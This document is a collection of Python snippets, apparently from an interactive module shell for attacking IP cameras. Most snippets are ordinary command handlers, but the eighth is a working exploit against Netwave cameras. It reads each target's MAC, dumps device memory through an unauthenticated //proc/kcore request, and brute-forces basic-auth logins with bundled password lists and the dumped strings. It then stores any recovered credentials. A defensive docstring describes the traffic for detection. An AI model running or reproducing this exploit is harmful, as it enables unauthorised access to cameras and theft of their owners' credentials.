示例#1
 def do_info(self, line):
     """info
     Prints module info"""
     # Docstring kept verbatim: on a cmd-style shell the do_* docstrings are
     # usually what `help` prints (assumed, the class header is not visible here).
     # `line` carries the rest of the command line and is not used.
     frame = self.current_frame
     if not frame:
         # No module selected yet, so there is no metadata to display.
         print_utils.time_print("Select module first")
         return
     # Pretty-print the selected module's __info__ attribute.
     pp(frame.__info__, indent=4)
示例#2
 def do_run(self, line):
     """run
     Run current module"""
     # Docstring kept verbatim: it is presumably surfaced as help text by the shell.
     # `line` is accepted for the command-handler signature and is not used.
     frame = self.current_frame
     if frame is None:
         print_utils.time_print("Select module first")
         return
     # Delegate to the selected module, then leave two blank lines after its output.
     frame.run()
     print("\n\n", end="")
示例#3
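 def do_show(self, line):
     """show {options/modules/info}
     Shows details"""
     # The usage line names the command this handler actually serves and lists
     # all three accepted arguments.
     #
     # "options" and "info" both read from the selected module. Check for a
     # selection once so that "info" without a module prints the same hint as
     # "options" instead of failing on None.print_info().
     if line in ("options", "info") and self.current_frame is None:
         print_utils.time_print("Select module first")
         return
     if line == "options":
         print("")
         self.current_frame.print_options()
     elif line == "info":
         print("")
         self.current_frame.print_info()
     elif line == "modules" or line == "":
         # An empty argument defaults to the module listing; the empty search
         # term passed to the table helper is taken from the original call.
         print("")
         print(print_utils.get_modules_search_table("", self.modules._arr))
     # Any other argument is silently ignored, as before.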
示例#4
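    def do_set(self, line):
        """set [option_name] [value]
        Set option value for current module"""
        def usage():
            # Shared complaint for every malformed 'set' invocation.
            print_utils.time_print(
                "Invalid number of arguments for 'set' command")
            print_utils.time_print("set command usage: set <option> <value>")

        if not self.current_frame:
            print_utils.time_print("Select module first")
            return False

        parts = line.split(" ")
        if len(parts) < 2:
            usage()
            return False
        if len(parts) > 2:
            # More than one value token is only accepted when the value starts
            # with the list indicator; the tokens are then glued back together
            # (without separators, as the original did) into a single value.
            if not parts[1].startswith(config.LST_IND):
                usage()
                return False
            parts = [parts[0], "".join(parts[1:])]
        opt_name, opt_set_value = parts

        # Only the first option with a matching name is ever updated.
        option = next(
            (item for item in self.current_frame._options
             if item.opt_name == opt_name),
            None)
        if option is None:
            print_utils.time_print("There's no option called '%s'" % opt_name)
            return

        try:
            option.set_option_value(opt_set_value)
            print_utils.clear_screen()
        except Exception as e:
            # Validation errors raised by the option are shown to the user
            # rather than propagated out of the shell loop.
            print_utils.clear_screen()
            print("[-]", e, "\n")
        self.current_frame.print_options()
        return False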
示例#5
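 def do_use(self, line):
     """use {module_name/module_id}
     Use module"""
     # Only the first space-separated token is considered.
     requested = line.split(" ")[0]
     # By id or by name: a token that parses as an integer is looked up by id,
     # anything else by name.
     try:
         loc_module = self.modules.by_id(int(requested))
     except ValueError:
         module_name = requested
         loc_module = self.modules.by_name(module_name)
     else:
         module_name = loc_module["use_name"] if loc_module else None

     if loc_module is None:
         # Report what the user typed; a failed id lookup leaves module_name
         # as None, which made the message read "No such module like: None".
         print_utils.time_print("No such module like: %s" % requested)
         return False

     # Create frame: bind_frame returns a class for the module handle, which is
     # instantiated and becomes the shell's current module.
     self.current_frame = bind_frame(loc_module["handle"])()
     self.current_frame.print_options()
     self.prompt = self.format_prompt % module_name
     return False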
示例#6
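 def usage():
     """Print the argument-count complaint and usage line for 'search'."""
     print_utils.time_print(
         "Invalid number of arguments for 'search' command")
     # The usage line previously began with "set command usage", a leftover
     # from the 'set' helper; it now names the command it documents.
     print_utils.time_print("search command usage: search <term>")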
示例#7
 def usage():
     """Print the argument-count complaint and usage line for 'set'."""
     messages = (
         "Invalid number of arguments for 'set' command",
         "set command usage: set <option> <value>",
     )
     for message in messages:
         print_utils.time_print(message)
示例#8
    def run(self):
        """Run the module against every entry of the ``targets`` option.

        Per target, in order:
          * skip it when ``self.db.is_camera_in_credentials`` already knows it;
          * when the ``brute`` or ``brute-only`` option is set, try the bundled
            username/password lists against ``check_user.cgi`` using HTTP
            basic auth;
          * read the device MAC through ``netwave_get_mac`` (``get_status.cgi``);
          * stream ``//proc/kcore`` over HTTP without credentials, extract
            strings from each chunk until the MAC appears, and store them with
            ``self.db.insert_dump``;
          * try the extracted strings as username/password pairs against
            ``check_user.cgi`` and record hits with ``self.save``.

        Returns False when ``self.validate()`` fails; otherwise the method
        falls off the end and returns None.

        Defensive reading: a device answering 200 to a GET for ``//proc/kcore``
        is serving memory contents through its web server. The request
        sequence visible here (``get_status.cgi``, one long-running GET for
        ``//proc/kcore``, then bursts of basic-auth attempts on
        ``check_user.cgi``) is what proxy or IDS logs in front of such a
        device would record. Whatever ``self.save`` and ``insert_dump`` write
        holds recovered credentials and raw memory strings, so that store is
        sensitive data in its own right.
        """
        if not self.validate():
            print_utils.time_print("Module run stopped")
            return False
        # init variables
        targets, ssl = self.opt_val("targets"), self.opt_val("ssl")

        protocol = "https" if ssl else "http"
        # One 4-tuple per target:
        #   [0] status URL, [1] memory-file URL, [2] auth-check URL, [3] the target itself.
        pool = [(
            "%s://%s/get_status.cgi" % (protocol, target),
            "%s://%s//proc/kcore" % (protocol, target),
            "%s://%s/check_user.cgi" % (protocol, target),
            "%s" % (target),
        ) for target in targets]
        # `location` is only used as the denominator of the progress percentage below.
        location = 10100
        # Seconds to pause between the dump and the credential attempts.
        sleeping = 20

        for P in pool:
            dump_results = []
            print("[>] Target:", P[3])
            string_len = 0
            # Step -1: skip if in db
            if self.db.is_camera_in_credentials(P[3]) is True:
                print("[*] Target already in database (skipping)")
                continue
            # Step 0: soft bruteforce
            if self.opt_val("brute") or self.opt_val("brute-only"):
                # The two-name unpack requires the target to be "host:port"
                # with exactly one colon.
                ip, port = P[3].split(":")
                http_discovery = HTTPStatusCodeDiscovery(ip, port)
                # Looks for check_user.cgi answering 401 (i.e. asking for credentials).
                endpoints = http_discovery.discover(["check_user.cgi"], 401)
                if endpoints != []:
                    brute_url = endpoints[0]["url"]
                    print("Trying to bruteforce:", brute_url)
                    soft_brute = HTTPBruteforce()
                    usernames = AssetManager(
                        ["bruteforce", "easy_usernames.txt"])
                    passwords = AssetManager(
                        ["bruteforce", "easy_passwords.txt"])
                    results = soft_brute.http_basic_auth_bruteforce(
                        brute_url,
                        usernames.lines(),
                        passwords.lines(),
                        verbose=True)
                    for user, pwd in results:
                        self.save(ipport=P[3], user=user, pwd=pwd)
                if results != []:
                    print("[+] Bruteforce succeeded. Skipping this target.")
                    continue
                else:
                    if self.opt_val("brute-only"):
                        continue
                    print("[*] Bruteforce failed. Sleeping 10s to recover.")
                    time.sleep(10)
            # Step 1 : Get MAC
            try:
                # The MAC is kept as bytes: it is decoded for display here and
                # compared against the extracted byte strings in step 2.
                self.MAC = netwave_get_mac(P[0])
                print("Got MAC: %s" % str(self.MAC, "utf8"))
            except Exception as e:
                # Any failure here abandons this target and moves to the next.
                print("Got MAC exception:", e)
                continue
            # Step 2 : Dump
            try:
                # Streamed so the response is processed chunk by chunk instead
                # of being held in memory as a whole.
                req = requests.get(P[1], stream=True, timeout=7)
                print("Status code:", req.status_code)
                print("Vulnarable:", "Yes" if req.status_code == 200 else "No")

                for chunk in req.iter_content(chunk_size=8192):
                    # regex_strings returns the strings found in the chunk plus
                    # a number that is accumulated for the progress display.
                    lst, _ = strings.regex_strings(chunk)
                    string_len += _
                    print("\rProgress: %.2f%%\t" %
                          ((string_len / location) * 100),
                          end="")
                    # The MAC acts as a marker: the first chunk containing it
                    # is the one whose strings are kept and stored.
                    if self.MAC in lst:
                        print("\n[+] Found location")
                        dump_results = lst
                        self.db.insert_dump(ipport=P[3],
                                            dump=b":::".join(dump_results))
                        break

                # Step 3 : Bruteforce
                if dump_results != []:
                    # Drops the response reference before pausing, presumably
                    # to let the streaming connection be released.
                    del req
                    print("\nSleeping: %ss" % sleeping)
                    time.sleep(sleeping)
                    brute = HTTPBruteforce()
                    # De-duplicated strings are used as both the username list
                    # and the password list.
                    creds = list(set(dump_results))
                    results = brute.http_basic_auth_bruteforce(P[2],
                                                               creds,
                                                               creds,
                                                               verbose=True)
                    for user, pwd in results:
                        self.save(ipport=P[3], user=user, pwd=pwd)
            except Exception as e:
                # Network, parsing and storage errors are all reported the same
                # way and end the work on this target.
                print("Dump exception: ", e)
                continue
示例#9
 def run(self):
     if not self.validate():
         print_utils.time_print("Module run stopped")
         return False